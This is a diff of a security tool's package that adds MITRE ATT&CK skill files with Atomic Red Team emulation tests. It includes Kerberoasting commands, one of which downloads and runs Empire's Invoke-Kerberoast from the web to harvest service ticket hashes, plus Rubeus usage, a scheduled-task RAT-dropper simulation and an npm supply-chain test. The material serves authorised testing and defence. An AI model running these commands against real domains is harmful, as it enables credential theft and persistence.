  581. package/skill/mitre_attack/TA0040_impact/T1496.004_cloud-service-hijacking/SKILL.md +7 -4
  582. package/skill/mitre_attack/TA0040_impact/T1496_resource-hijacking/SKILL.md +36 -4
  583. package/skill/mitre_attack/TA0040_impact/T1498.001_direct-network-flood/SKILL.md +7 -4
  584. package/skill/mitre_attack/TA0040_impact/T1498.002_reflection-amplification/SKILL.md +7 -4
  585. package/skill/mitre_attack/TA0040_impact/T1498_network-denial-of-service/SKILL.md +7 -4
  586. package/skill/mitre_attack/TA0040_impact/T1499.001_os-exhaustion-flood/SKILL.md +7 -4
  587. package/skill/mitre_attack/TA0040_impact/T1499.002_service-exhaustion-flood/SKILL.md +7 -4
  588. package/skill/mitre_attack/TA0040_impact/T1499.003_application-exhaustion-flood/SKILL.md +7 -4
  589. package/skill/mitre_attack/TA0040_impact/T1499.004_application-or-system-exploitation/SKILL.md +7 -4
  590. package/skill/mitre_attack/TA0040_impact/T1499_endpoint-denial-of-service/SKILL.md +7 -4
  591. package/skill/mitre_attack/TA0040_impact/T1529_system-shutdownreboot/SKILL.md +67 -4
  592. package/skill/mitre_attack/TA0040_impact/T1531_account-access-removal/SKILL.md +78 -4
  593. package/skill/mitre_attack/TA0040_impact/T1561.001_disk-content-wipe/SKILL.md +7 -4
  594. package/skill/mitre_attack/TA0040_impact/T1561.002_disk-structure-wipe/SKILL.md +7 -4
  595. package/skill/mitre_attack/TA0040_impact/T1561_disk-wipe/SKILL.md +7 -4
  596. package/skill/mitre_attack/TA0040_impact/T1565.001_stored-data-manipulation/SKILL.md +7 -4
  597. package/skill/mitre_attack/TA0040_impact/T1565.002_transmitted-data-manipulation/SKILL.md +7 -4
  598. package/skill/mitre_attack/TA0040_impact/T1565.003_runtime-data-manipulation/SKILL.md +7 -4
  599. package/skill/mitre_attack/TA0040_impact/T1565_data-manipulation/SKILL.md +7 -4
  600. package/skill/mitre_attack/TA0040_impact/T1657_financial-theft/SKILL.md +7 -4
  601. package/skill/mitre_attack/TA0040_impact/T1667_email-bombing/SKILL.md +7 -4
  602. package/skill/mitre_attack/TA0042_resource-development/T1583.001_domains/SKILL.md +11 -4
  603. package/skill/mitre_attack/TA0042_resource-development/T1583.002_dns-server/SKILL.md +7 -4
  604. package/skill/mitre_attack/TA0042_resource-development/T1583.003_virtual-private-server/SKILL.md +7 -4
  605. package/skill/mitre_attack/TA0042_resource-development/T1583.004_server/SKILL.md +7 -4
  606. package/skill/mitre_attack/TA0042_resource-development/T1583.005_botnet/SKILL.md +7 -4
  607. package/skill/mitre_attack/TA0042_resource-development/T1583.006_web-services/SKILL.md +7 -4
  608. package/skill/mitre_attack/TA0042_resource-development/T1583.007_serverless/SKILL.md +7 -4
  609. package/skill/mitre_attack/TA0042_resource-development/T1583.008_malvertising/SKILL.md +7 -4
  610. package/skill/mitre_attack/TA0042_resource-development/T1583_acquire-infrastructure/SKILL.md +7 -4
  611. package/skill/mitre_attack/TA0042_resource-development/T1584.001_domains/SKILL.md +7 -4
  612. package/skill/mitre_attack/TA0042_resource-development/T1584.002_dns-server/SKILL.md +7 -4
  613. package/skill/mitre_attack/TA0042_resource-development/T1584.003_virtual-private-server/SKILL.md +7 -4
  614. package/skill/mitre_attack/TA0042_resource-development/T1584.004_server/SKILL.md +7 -4
  615. package/skill/mitre_attack/TA0042_resource-development/T1584.005_botnet/SKILL.md +7 -4
  616. package/skill/mitre_attack/TA0042_resource-development/T1584.006_web-services/SKILL.md +7 -4
  617. package/skill/mitre_attack/TA0042_resource-development/T1584.007_serverless/SKILL.md +7 -4
  618. package/skill/mitre_attack/TA0042_resource-development/T1584.008_network-devices/SKILL.md +7 -4
  619. package/skill/mitre_attack/TA0042_resource-development/T1584_compromise-infrastructure/SKILL.md +7 -4
  620. package/skill/mitre_attack/TA0042_resource-development/T1585.001_social-media-accounts/SKILL.md +7 -4
  621. package/skill/mitre_attack/TA0042_resource-development/T1585.002_email-accounts/SKILL.md +7 -4
  622. package/skill/mitre_attack/TA0042_resource-development/T1585.003_cloud-accounts/SKILL.md +7 -4
  623. package/skill/mitre_attack/TA0042_resource-development/T1585_establish-accounts/SKILL.md +7 -4
  624. package/skill/mitre_attack/TA0042_resource-development/T1586.001_social-media-accounts/SKILL.md +7 -4
  625. package/skill/mitre_attack/TA0042_resource-development/T1586.002_email-accounts/SKILL.md +7 -4
  626. package/skill/mitre_attack/TA0042_resource-development/T1586.003_cloud-accounts/SKILL.md +7 -4
  627. package/skill/mitre_attack/TA0042_resource-development/T1586_compromise-accounts/SKILL.md +7 -4
  628. package/skill/mitre_attack/TA0042_resource-development/T1587.001_malware/SKILL.md +7 -4
  629. package/skill/mitre_attack/TA0042_resource-development/T1587.002_code-signing-certificates/SKILL.md +7 -4
  630. package/skill/mitre_attack/TA0042_resource-development/T1587.003_digital-certificates/SKILL.md +7 -4
  631. package/skill/mitre_attack/TA0042_resource-development/T1587.004_exploits/SKILL.md +7 -4
  632. package/skill/mitre_attack/TA0042_resource-development/T1587_develop-capabilities/SKILL.md +7 -4
  633. package/skill/mitre_attack/TA0042_resource-development/T1588.001_malware/SKILL.md +7 -4
  634. package/skill/mitre_attack/TA0042_resource-development/T1588.002_tool/SKILL.md +7 -4
  635. package/skill/mitre_attack/TA0042_resource-development/T1588.003_code-signing-certificates/SKILL.md +7 -4
  636. package/skill/mitre_attack/TA0042_resource-development/T1588.004_digital-certificates/SKILL.md +7 -4
  637. package/skill/mitre_attack/TA0042_resource-development/T1588.005_exploits/SKILL.md +7 -4
  638. package/skill/mitre_attack/TA0042_resource-development/T1588.006_vulnerabilities/SKILL.md +7 -4
  639. package/skill/mitre_attack/TA0042_resource-development/T1588.007_artificial-intelligence/SKILL.md +7 -4
  640. package/skill/mitre_attack/TA0042_resource-development/T1588_obtain-capabilities/SKILL.md +7 -4
  641. package/skill/mitre_attack/TA0042_resource-development/T1608.001_upload-malware/SKILL.md +7 -4
  642. package/skill/mitre_attack/TA0042_resource-development/T1608.002_upload-tool/SKILL.md +7 -4
  643. package/skill/mitre_attack/TA0042_resource-development/T1608.003_install-digital-certificate/SKILL.md +7 -4
  644. package/skill/mitre_attack/TA0042_resource-development/T1608.004_drive-by-target/SKILL.md +7 -4
  645. package/skill/mitre_attack/TA0042_resource-development/T1608.005_link-target/SKILL.md +7 -4
  646. package/skill/mitre_attack/TA0042_resource-development/T1608.006_seo-poisoning/SKILL.md +7 -4
  647. package/skill/mitre_attack/TA0042_resource-development/T1608_stage-capabilities/SKILL.md +7 -4
  648. package/skill/mitre_attack/TA0042_resource-development/T1650_acquire-access/SKILL.md +7 -4
  649. package/skill/mitre_attack/TA0043_reconnaissance/T1589.001_credentials/SKILL.md +7 -4
  650. package/skill/mitre_attack/TA0043_reconnaissance/T1589.002_email-addresses/SKILL.md +7 -4
  651. package/skill/mitre_attack/TA0043_reconnaissance/T1589.003_employee-names/SKILL.md +7 -4
  652. package/skill/mitre_attack/TA0043_reconnaissance/T1589_gather-victim-identity-information/SKILL.md +7 -4
  653. package/skill/mitre_attack/TA0043_reconnaissance/T1590.001_domain-properties/SKILL.md +7 -4
  654. package/skill/mitre_attack/TA0043_reconnaissance/T1590.002_dns/SKILL.md +7 -4
  655. package/skill/mitre_attack/TA0043_reconnaissance/T1590.003_network-trust-dependencies/SKILL.md +7 -4
  656. package/skill/mitre_attack/TA0043_reconnaissance/T1590.004_network-topology/SKILL.md +7 -4
  657. package/skill/mitre_attack/TA0043_reconnaissance/T1590.005_ip-addresses/SKILL.md +7 -4
  658. package/skill/mitre_attack/TA0043_reconnaissance/T1590.006_network-security-appliances/SKILL.md +7 -4
  659. package/skill/mitre_attack/TA0043_reconnaissance/T1590_gather-victim-network-information/SKILL.md +7 -4
  660. package/skill/mitre_attack/TA0043_reconnaissance/T1591.001_determine-physical-locations/SKILL.md +7 -4
  661. package/skill/mitre_attack/TA0043_reconnaissance/T1591.002_business-relationships/SKILL.md +7 -4
  662. package/skill/mitre_attack/TA0043_reconnaissance/T1591.003_identify-business-tempo/SKILL.md +7 -4
  663. package/skill/mitre_attack/TA0043_reconnaissance/T1591.004_identify-roles/SKILL.md +7 -4
  664. package/skill/mitre_attack/TA0043_reconnaissance/T1591_gather-victim-org-information/SKILL.md +7 -4
  665. package/skill/mitre_attack/TA0043_reconnaissance/T1592.001_hardware/SKILL.md +7 -4
  666. package/skill/mitre_attack/TA0043_reconnaissance/T1592.002_software/SKILL.md +7 -4
  667. package/skill/mitre_attack/TA0043_reconnaissance/T1592.003_firmware/SKILL.md +7 -4
  668. package/skill/mitre_attack/TA0043_reconnaissance/T1592.004_client-configurations/SKILL.md +7 -4
  669. package/skill/mitre_attack/TA0043_reconnaissance/T1592_gather-victim-host-information/SKILL.md +7 -4
  670. package/skill/mitre_attack/TA0043_reconnaissance/T1593.001_social-media/SKILL.md +7 -4
  671. package/skill/mitre_attack/TA0043_reconnaissance/T1593.002_search-engines/SKILL.md +7 -4
  672. package/skill/mitre_attack/TA0043_reconnaissance/T1593.003_code-repositories/SKILL.md +7 -4
  673. package/skill/mitre_attack/TA0043_reconnaissance/T1593_search-open-websitesdomains/SKILL.md +7 -4
  674. package/skill/mitre_attack/TA0043_reconnaissance/T1594_search-victim-owned-websites/SKILL.md +7 -4
  675. package/skill/mitre_attack/TA0043_reconnaissance/T1595.001_scanning-ip-blocks/SKILL.md +7 -4
  676. package/skill/mitre_attack/TA0043_reconnaissance/T1595.002_vulnerability-scanning/SKILL.md +7 -4
  677. package/skill/mitre_attack/TA0043_reconnaissance/T1595.003_wordlist-scanning/SKILL.md +7 -4
  678. package/skill/mitre_attack/TA0043_reconnaissance/T1595_active-scanning/SKILL.md +7 -4
  679. package/skill/mitre_attack/TA0043_reconnaissance/T1596.001_dnspassive-dns/SKILL.md +7 -4
  680. package/skill/mitre_attack/TA0043_reconnaissance/T1596.002_whois/SKILL.md +7 -4
  681. package/skill/mitre_attack/TA0043_reconnaissance/T1596.003_digital-certificates/SKILL.md +7 -4
  682. package/skill/mitre_attack/TA0043_reconnaissance/T1596.004_cdns/SKILL.md +7 -4
  683. package/skill/mitre_attack/TA0043_reconnaissance/T1596.005_scan-databases/SKILL.md +7 -4
  684. package/skill/mitre_attack/TA0043_reconnaissance/T1596_search-open-technical-databases/SKILL.md +7 -4
  685. package/skill/mitre_attack/TA0043_reconnaissance/T1597.001_threat-intel-vendors/SKILL.md +7 -4
  686. package/skill/mitre_attack/TA0043_reconnaissance/T1597.002_purchase-technical-data/SKILL.md +7 -4
  687. package/skill/mitre_attack/TA0043_reconnaissance/T1597_search-closed-sources/SKILL.md +7 -4
  688. package/skill/mitre_attack/TA0043_reconnaissance/T1598.001_spearphishing-service/SKILL.md +7 -4
  689. package/skill/mitre_attack/TA0043_reconnaissance/T1598.002_spearphishing-attachment/SKILL.md +7 -4
  690. package/skill/mitre_attack/TA0043_reconnaissance/T1598.003_spearphishing-link/SKILL.md +7 -4
  691. package/skill/mitre_attack/TA0043_reconnaissance/T1598.004_spearphishing-voice/SKILL.md +7 -4
  692. package/skill/mitre_attack/TA0043_reconnaissance/T1598_phishing-for-information/SKILL.md +7 -4
  693. package/skill/mitre_attack/TA0043_reconnaissance/T1681_search-threat-vendor-data/SKILL.md +7 -4
  694. package/skill/mitre_attack/__pycache__/generate_skills_with_art.cpython-314.pyc +0 -0
  695. package/skill/mitre_attack/generate_skills_with_art.py +636 -0
  696. package/skill/mitre_attack_test/test_enterprise.json +7550 -0
  697. package/skill/mitre_skills_backup_20260422_104312.tar.gz +0 -0
package/package.json CHANGED
@@ -7,7 +7,7 @@
7
7
  "scripts": {
8
8
  "postinstall": "bun ./postinstall.mjs || node ./postinstall.mjs"
9
9
  },
10
- "version": "1.1.10-beta.3",
10
+ "version": "1.1.10-beta.4",
11
11
  "license": "AGPL-3.0-only",
12
12
  "keywords": [
13
13
  "cyberstrike",
@@ -37,6 +37,6 @@
37
37
  "url": "https://github.com/CyberStrikeus/CyberStrike.git"
38
38
  },
39
39
  "optionalDependencies": {
40
- "@cyberstrike-io/cyberstrike-darwin-arm64": "1.1.10-beta.3"
40
+ "@cyberstrike-io/cyberstrike-darwin-arm64": "1.1.10-beta.4"
41
41
  }
42
42
  }
@@ -0,0 +1,93 @@
1
+ # DEMO: Kerberoasting with Atomic Red Team Tests
2
+
3
+ ## How to Test
4
+
5
+ ### Atomic Red Team Tests
6
+
7
+ The following tests are from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) and provide actionable ways to test this technique:
8
+
9
+ ### Atomic Test 1: Request for service tickets
10
+
11
+ This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1
12
+ The following are further sources and credits for this attack:
13
+ [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
14
+ [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
15
+ when executed successfully , the test displays available services with their hashes.
16
+ If the testing domain doesn't have any service principal name configured, there is no output
17
+
18
+ **Supported Platforms:** windows
19
+
20
+ ```powershell
21
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
22
+ iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
23
+ Invoke-Kerberoast | fl
24
+ ```
25
+
26
+ **Dependencies:**
27
+ - Computer must be domain joined
28
+
29
+ ### Atomic Test 2: Rubeus kerberoast
30
+
31
+ Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
32
+ This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus
33
+
34
+ **Supported Platforms:** windows
35
+
36
+ ```powershell
37
+ klist purge
38
+ cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
39
+ ```
40
+
41
+ **Dependencies:**
42
+ - Computer must be domain joined
43
+ - Rubeus must exist
44
+
45
+ ### Atomic Test 3: Extract all accounts in use as SPN using setspn
46
+
47
+ The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack.
48
+ A successful execution will output all the SPNs for the related domain.
49
+
50
+ **Supported Platforms:** windows
51
+
52
+ ```cmd
53
+ setspn -T #{domain_name} -Q */*
54
+ ```
55
+
56
+ **Dependencies:**
57
+ - Computer must be domain joined
58
+
59
+ ### Atomic Test 4: Request A Single Ticket via PowerShell
60
+
61
+ The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack.
62
+ A successful execution will output the SPNs for the endpoint in question.
63
+
64
+ **Supported Platforms:** windows
65
+
66
+ ```powershell
67
+ Add-Type -AssemblyName System.IdentityModel
68
+ $ComputerFQDN=$env:LogonServer.trimStart('\') + "." + $env:UserDnsDomain
69
+ New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/$ComputerFQDN"
70
+ ```
71
+
72
+ **Dependencies:**
73
+ - Computer must be domain joined
74
+
75
+ ### Atomic Test 5: Request All Tickets via PowerShell
76
+
77
+ The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack.
78
+ A successful execution will output the SPNs for the domain in question.
79
+
80
+ **Supported Platforms:** windows
81
+
82
+ ```powershell
83
+ Add-Type -AssemblyName System.IdentityModel
84
+ setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
85
+ ```
86
+
87
+ **Dependencies:**
88
+ - Computer must be domain joined
89
+
90
+
91
+ ---
92
+
93
+ ✅ **7 actionable tests** from Atomic Red Team!
@@ -78,13 +78,15 @@ Unlike Exploit Public-Facing Application, the focus of this technique is to expl
78
78
 
79
79
  ## How to Test
80
80
 
81
- ### Identify Attack Surface
81
+ ### Manual Testing
82
82
 
83
- Determine if the target environment is susceptible to Drive-by Compromise by examining the target platforms (Identity Provider, Linux, macOS).
83
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Drive-by Compromise by examining the target platforms (Identity Provider, Linux, macOS).
84
84
 
85
- ### Assess Existing Defenses
85
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1189 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
86
86
 
87
- Review whether mitigations for T1189 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
87
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
88
+
89
+ > **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
88
90
 
89
91
  ## Remediation Guide
90
92
 
@@ -132,4 +134,5 @@ Train users to be aware of access or manipulation attempts by an adversary to re
132
134
  - [push notification -mcafee](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/scammers-impersonating-windows-defender-to-push-malicious-windows-apps/)
133
135
  - [Push notifications - viruspositive](https://viruspositive.com/resources/blogs/the-dark-side-of-web-push-notifications)
134
136
  - [push notifications - malwarebytes](https://www.malwarebytes.com/blog/news/2019/01/browser-push-notifications-feature-asking-abused)
137
+ - [Atomic Red Team - T1189](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1189)
135
138
  - [MITRE ATT&CK - T1189](https://attack.mitre.org/techniques/T1189)
@@ -77,13 +77,15 @@ For websites and databases, the OWASP top 10 and CWE top 25 highlight the most c
77
77
 
78
78
  ## How to Test
79
79
 
80
- ### Identify Attack Surface
80
+ ### Manual Testing
81
81
 
82
- Determine if the target environment is susceptible to Exploit Public-Facing Application by examining the target platforms (Containers, ESXi, IaaS).
82
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Exploit Public-Facing Application by examining the target platforms (Containers, ESXi, IaaS).
83
83
 
84
- ### Assess Existing Defenses
84
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1190 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
85
85
 
86
- Review whether mitigations for T1190 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
86
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
87
+
88
+ > **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
87
89
 
88
90
  ## Remediation Guide
89
91
 
@@ -143,4 +145,5 @@ Update software regularly by employing patch management for externally exposed a
143
145
  - [Cisco Blog Legacy Device Attacks](https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954)
144
146
  - [OWASP Top 10](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)
145
147
  - [US-CERT TA18-106A Network Infrastructure Devices 2018](https://us-cert.cisa.gov/ncas/alerts/TA18-106A)
148
+ - [Atomic Red Team - T1190](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1190)
146
149
  - [MITRE ATT&CK - T1190](https://attack.mitre.org/techniques/T1190)
@@ -69,13 +69,15 @@ Targeting may be specific to a desired victim set or may be distributed to a bro
69
69
 
70
70
  ## How to Test
71
71
 
72
- ### Identify Attack Surface
72
+ ### Manual Testing
73
73
 
74
- Determine if the target environment is susceptible to Compromise Software Dependencies and Development Tools by examining the target platforms (Linux, macOS, Windows).
74
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Compromise Software Dependencies and Development Tools by examining the target platforms (Linux, macOS, Windows).
75
75
 
76
- ### Assess Existing Defenses
76
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1195.001 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
77
77
 
78
- Review whether mitigations for T1195.001 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
78
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
79
+
80
+ > **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
79
81
 
80
82
  ## Remediation Guide
81
83
 
@@ -122,4 +124,5 @@ Application developers should be cautious when selecting third-party libraries t
122
124
  - [Bitdefender NPM Repositories Compromised 2021](https://www.bitdefender.com/en-gb/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack)
123
125
  - [Trendmicro NPM Compromise](https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets)
124
126
  - [Checkmarx-oss-seo](https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/)
127
+ - [Atomic Red Team - T1195.001](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1195.001)
125
128
  - [MITRE ATT&CK - T1195.001](https://attack.mitre.org/techniques/T1195/001)
@@ -67,13 +67,33 @@ Targeting may be specific to a desired victim set or may be distributed to a bro
67
67
 
68
68
  ## How to Test
69
69
 
70
- ### Identify Attack Surface
70
+ ### Atomic Red Team Tests
71
71
 
72
- Determine if the target environment is susceptible to Compromise Software Supply Chain by examining the target platforms (Linux, Windows, macOS).
72
+ The following tests are from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) and provide actionable ways to test this technique:
73
73
 
74
- ### Assess Existing Defenses
74
+ ### Atomic Test 1: Simulate npm package installation on a Linux system
75
75
 
76
- Review whether mitigations for T1195.002 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
76
+ Launches a short‑lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package without audit/fund/package‑lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency confusion) from within a container. The pod is deleted after execution.
77
+
78
+ **Supported Platforms:** containers, linux
79
+
80
+ ```bash
81
+ kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
82
+ ```
83
+
84
+ **Dependencies:**
85
+ - kubectl must be installed and configured
86
+
87
+
88
+ ### Manual Testing
89
+
90
+ If Atomic Red Team tests are not applicable, manually verify the technique by:
91
+
92
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Compromise Software Supply Chain by examining the target platforms (Linux, Windows, macOS).
93
+
94
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1195.002 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
95
+
96
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
77
97
 
78
98
  ## Remediation Guide
79
99
 
@@ -106,4 +126,5 @@ Continuous monitoring of vulnerability sources and the use of automatic and manu
106
126
 
107
127
  - [Avast CCleaner3 2018](https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities)
108
128
  - [Command Five SK 2011](https://web.archive.org/web/20160309235002/https://www.commandfive.com/papers/C5_APT_SKHack.pdf)
129
+ - [Atomic Red Team - T1195.002](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1195.002)
109
130
  - [MITRE ATT&CK - T1195.002](https://attack.mitre.org/techniques/T1195/002)
@@ -65,13 +65,15 @@ Adversaries may manipulate hardware components in products prior to receipt by a
65
65
 
66
66
  ## How to Test
67
67
 
68
- ### Identify Attack Surface
68
+ ### Manual Testing
69
69
 
70
- Determine if the target environment is susceptible to Compromise Hardware Supply Chain by examining the target platforms (Linux, macOS, Windows).
70
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Compromise Hardware Supply Chain by examining the target platforms (Linux, macOS, Windows).
71
71
 
72
- ### Assess Existing Defenses
72
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1195.003 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
73
73
 
74
- Review whether mitigations for T1195.003 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
74
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
75
+
76
+ > **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
75
77
 
76
78
  ## Remediation Guide
77
79
 
@@ -99,4 +101,5 @@ Use Trusted Platform Module technology and a secure or trusted boot process to p
99
101
 
100
102
  ## References
101
103
 
104
+ - [Atomic Red Team - T1195.003](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1195.003)
102
105
  - [MITRE ATT&CK - T1195.003](https://attack.mitre.org/techniques/T1195/003)
@@ -81,13 +81,36 @@ In some cases, adversaries may conduct “second-order” supply chain compromis
81
81
 
82
82
  ## How to Test
83
83
 
84
- ### Identify Attack Surface
84
+ ### Atomic Red Team Tests
85
85
 
86
- Determine if the target environment is susceptible to Supply Chain Compromise by examining the target platforms (Linux, Windows, macOS).
86
+ The following tests are from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) and provide actionable ways to test this technique:
87
87
 
88
- ### Assess Existing Defenses
88
+ ### Atomic Test 1: Octopus Scanner Malware Open Source Supply Chain
89
89
 
90
- Review whether mitigations for T1195 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
90
+ This test simulates an adversary Octopus drop the RAT dropper ExplorerSync.db
91
+ [octopus-scanner-malware-open-source-supply-chain](https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain/)
92
+ [the-supreme-backdoor-factory](https://www.dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/)
93
+
94
+ **Supported Platforms:** windows
95
+
96
+ ```cmd
97
+ copy %temp%\ExplorerSync.db %temp%\..\Microsoft\ExplorerSync.db
98
+ schtasks /create /tn ExplorerSync /tr "javaw -jar %temp%\..\Microsoft\ExplorerSync.db" /sc MINUTE /f
99
+ ```
100
+
101
+ **Dependencies:**
102
+ - ExplorerSync.db must exist on disk at specified location (#{rat_payload})
103
+
104
+
105
+ ### Manual Testing
106
+
107
+ If Atomic Red Team tests are not applicable, manually verify the technique by:
108
+
109
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Supply Chain Compromise by examining the target platforms (Linux, Windows, macOS).
110
+
111
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1195 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
112
+
113
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
91
114
 
92
115
  ## Remediation Guide
93
116
 
@@ -138,4 +161,5 @@ Where possible, consider requiring developers to pull from internal repositories
138
161
  - [Schneider Electric USB Malware](https://www.se.com/us/en/download/document/SESN-2018-236-01/)
139
162
  - [Trendmicro NPM Compromise](https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets)
140
163
  - [Microsoft Dofoil 2018](https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/)
164
+ - [Atomic Red Team - T1195](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1195)
141
165
  - [MITRE ATT&CK - T1195](https://attack.mitre.org/techniques/T1195)
@@ -73,13 +73,15 @@ In Office 365 environments, organizations may grant Microsoft partners or resell
73
73
 
74
74
  ## How to Test
75
75
 
76
- ### Identify Attack Surface
76
+ ### Manual Testing
77
77
 
78
- Determine if the target environment is susceptible to Trusted Relationship by examining the target platforms (Windows, SaaS, IaaS).
78
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Trusted Relationship by examining the target platforms (Windows, SaaS, IaaS).
79
79
 
80
- ### Assess Existing Defenses
80
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1199 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
81
81
 
82
- Review whether mitigations for T1199 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
82
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
83
+
84
+ > **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
83
85
 
84
86
  ## Remediation Guide
85
87
 
@@ -115,4 +117,5 @@ Network segmentation can be used to isolate infrastructure components that do no
115
117
 
116
118
  - [CISA IT Service Providers](https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers)
117
119
  - [Office 365 Delegated Administration](https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us)
120
+ - [Atomic Red Team - T1199](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1199)
118
121
  - [MITRE ATT&CK - T1199](https://attack.mitre.org/techniques/T1199)
@@ -59,13 +59,15 @@ While public references of usage by threat actors are scarce, many red teams/pen
59
59
 
60
60
  ## How to Test
61
61
 
62
- ### Identify Attack Surface
62
+ ### Manual Testing
63
63
 
64
- Determine if the target environment is susceptible to Hardware Additions by examining the target platforms (Windows, Linux, macOS).
64
+ 1. **Identify Attack Surface**: Determine if the target environment is susceptible to Hardware Additions by examining the target platforms (Windows, Linux, macOS).
65
65
 
66
- ### Assess Existing Defenses
66
+ 2. **Assess Existing Defenses**: Review whether mitigations for T1200 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
67
67
 
68
- Review whether mitigations for T1200 are in place. If defenses are absent or misconfigured, this technique may be exploitable.
68
+ 3. **Execute Test**: Use tools and methods described in the MITRE ATT&CK page and external references below.
69
+
70
+ > **Note**: No Atomic Red Team tests available for this technique. See [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team) for updates.
69
71
 
70
72
  ## Remediation Guide
71
73
 
